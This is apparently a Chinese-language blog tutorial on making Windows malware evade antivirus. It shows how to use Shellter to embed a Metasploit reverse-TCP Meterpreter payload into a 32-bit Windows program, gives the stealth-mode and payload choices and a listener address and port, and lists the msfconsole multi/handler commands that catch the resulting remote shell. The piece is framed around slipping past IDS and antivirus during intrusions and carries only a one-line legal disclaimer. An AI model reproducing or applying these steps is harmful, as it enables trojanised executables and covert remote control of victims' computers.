shellter免杀+metasploit监听远控

shellter免杀+metasploit监听远控

在黑客进行攻击的的过程中通常都需要规避安全防护设备,例如:入侵检测(IDS)或者杀毒软件(AV)。当在使用一些他人或者其它工具生成的exploit或者payload,例如:metasploit或者exploit-DB,在进行入侵的过程中很有可能被一些安全防护设备所发现。此时如果能够更改自己的malware、payload、或者shellcode,这样就能够绕过杀毒软件(AV)和其它安全防护设备。在篇文章中,我们将会使用shellter的方式绕过杀软(AV),与其他方式(Veil-Evasion等)相比,它在重新编码payloads通过AV软件方面效果更加显著。

1、Shellter工作方式简介

shellter能够重新编码本机32位独立的Windows应用程序。能够采用任何32位的Windows应用程序,并嵌入shellcode,还是Metasploit等应用程序提供的payload,利用这种方式通常都能够绕过杀软(AV)的检测。因此我们可以使用32位应用程序创建无限多个签名,从而绕过杀软(AV)的防护检测。

9b9947b1ca81

2、下载&安装

Kali Linux系统下安装:

Kali Linux系统下安装:
apt-get update
apt-get install shelter

Windows系统下:
https://www.shellterproject.com/Downloads/Shellter/Latest/shellter.zip

3、详细操作过程如下

(1)启动shellter

将下载后的压缩包进行减压并双击shellter.exe可执行文件,如图所示,将提前准备好的32位windows应用程序放置到shellter.exe同一目录,分别执行如下指令:
A: 表示自动操作
N: 表示不进行在线更新
PE Target:可执行文件的绝对路径

(2)设定payload

在执行的过程中提示:
A、是否使用隐身模式: Y
B、列举payload?:L
C、设定所选payload对应标号:1

0b58c454deb6

键入7

(3)设定反弹ip地址和端口号

SET LHOST: 192.168.43.167
SET LPORT: 4444
5c85dae4c618

(4)完成

等待结束后,回车可以退出当前界面,此时我们已经将payload嵌入到了宿主程序中。

3、metasploit处进行监听木马上线:

此处具体过程省略(相信大家都会)

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.43.167
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit -j

4、总结

禁止用于违法犯罪,后果自负。

© 版权声明
THE END
喜欢就支持一下吧
点赞2赞赏 分享
评论 共8条

请登录后发表评论